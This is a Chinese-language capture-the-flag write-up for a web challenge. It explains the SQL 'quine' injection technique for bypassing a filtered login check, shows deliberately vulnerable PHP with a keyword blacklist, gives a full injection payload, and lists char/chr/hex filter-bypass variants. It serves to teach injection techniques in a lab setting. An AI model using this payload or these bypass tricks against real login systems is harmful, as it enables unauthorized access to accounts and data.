WEB-PWD
直接给了源码:
<?php
error_reporting(0);
highlight_file(__FILE__);
$con = mysqli_connect("localhost","root","root","ccut");
function waffff($sql) {
if (preg_match("/infor|sys|sql|thread|case|when|if|like|left|right|mid|cmp|sub|locate|position|match|find|field|sleep|repeat|lock|bench|process|<|>|=|xor|and|&&|\\\\/i", $sql)) {
die("hacker");
}
}
if (isset($_POST['password'])) {
$password = $_POST['password'];
waffff($password);
$sql = "SELECT password FROM users WHERE username='admin' and password='$password'";
$user_result = mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if ($row['password'] === $password) {
include "/flag";
} else {
echo "error";
}
}
思路:爆破密码,但like被过滤,因为界面显示,无论访问成功与否都是一样的,无法使用布尔盲注,时间盲注的化sleep,if,substr等函数也被禁用,该题使用一种quine注入的技巧
Quine是什么
quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。标准术语是自产生程序,能够直接读取自己源码、读入用户输入或空白的程序一般都不视为自产生程序。纪念美国哲学家奎恩(Willard Van Orman Quine)而命名
而在sql
注入技术中,这是一种使得输入的sql
语句和输出的sql
语句一致的技术,常用于一些特殊的登陆绕过sql
注入中
replace()函数 replace(object,search,replace) 把object对象中出现的search全部替换成replace
Quine的基本形式就是
REPLACE(str,编码的间隔符,str)
复制
参数str的形式为
REPLACE(间隔符,编码的间隔符,间隔符)
复制
这样运算的结果形式又变成了REPLACE(str,编码的间隔符,str)
例如间隔符为”.
“,编码间隔符为CHAR(46)
,这样str就是
select REPLACE(".",CHAR(46),".");
+---------------------------+
| replace(".",char(46),".") |
+---------------------------+
| . |
+---------------------------+
复制
构造出来的结果就是
select REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');
+---------------------------------------------------------------------------+
| replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")') |
+---------------------------------------------------------------------------+
| replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") |
+---------------------------------------------------------------------------+
复制
但仔细观察可以发现还没有完全实现一致,在单双引号还存在细微区别。
在刚刚构造的Quine中
Quine: REPLACE('str',编码的间隔符,'str')
str: REPLACE("间隔符",编码的间隔符,"间隔符")
复制
这里str
中的间隔符使用双引号的原因是,str
已经被单引号包裹,为避免引号匹配问题引入新的转义符号,间隔符需要使用双引号
运算后的结果是REPLACE("str",编码的间隔符,"str")
,所以让结果的str也用单引号包裹就能让输入和查询结果完全一致了
这时候就需要使用REPLACE
将str
的双引号换成单引号,这样最后就不会出现引号不一致的情况了
升级版Quine的基本形式,CHAR(34)
是双引号,CHAR(39)
是单引号
REPLACE(REPLACE('str',CHAR(34),CHAR(39)),编码的间隔符,'str')
复制
升级版str的基本形式
REPLACE(REPLACE("间隔符",CHAR(34),CHAR(39)),编码的间隔符,"间隔符")
复制
先将str里的双引号替换成单引号,再用str替换str里的间隔符
那么结果就是
select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');
+------------------------------------------------------------------------------------------------------------------------------------------------------------+
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
+------------------------------------------------------------------------------------------------------------------------------------------------------------+
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
+------------------------------------------------------------------------------------------------------------------------------------------------------------+
复制
实例解析
例题来源:第五空间智能安全大赛-Web-yet_another_mysql_injection
$password=$_POST['password'];
if ($username !== 'admin') {
alertMes('only admin can login', 'index.php');
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {
die($FLAG);
}
复制
这是一部分源码,这段代码逻辑要求username
必须为admin
,密码需要与查询到的password
一致,才能拿到flag
通过盲注可以发现数据库里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine
这里我们就来分析一手payload
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
复制
其中1'/**/union/**/select/**/replace(replace('',char(34),char(39)),char(46),'')#
是Quine的基本形式
而1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#
是str的基本形式
这样嵌套起来多次替换就达到了输入输出的相同的目的
如果char被过滤了,可以使用chr
和0x
绕过
char(34),char(39)
chr(34),chr(39)
0x22,0x27
综上
payload:
password=1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#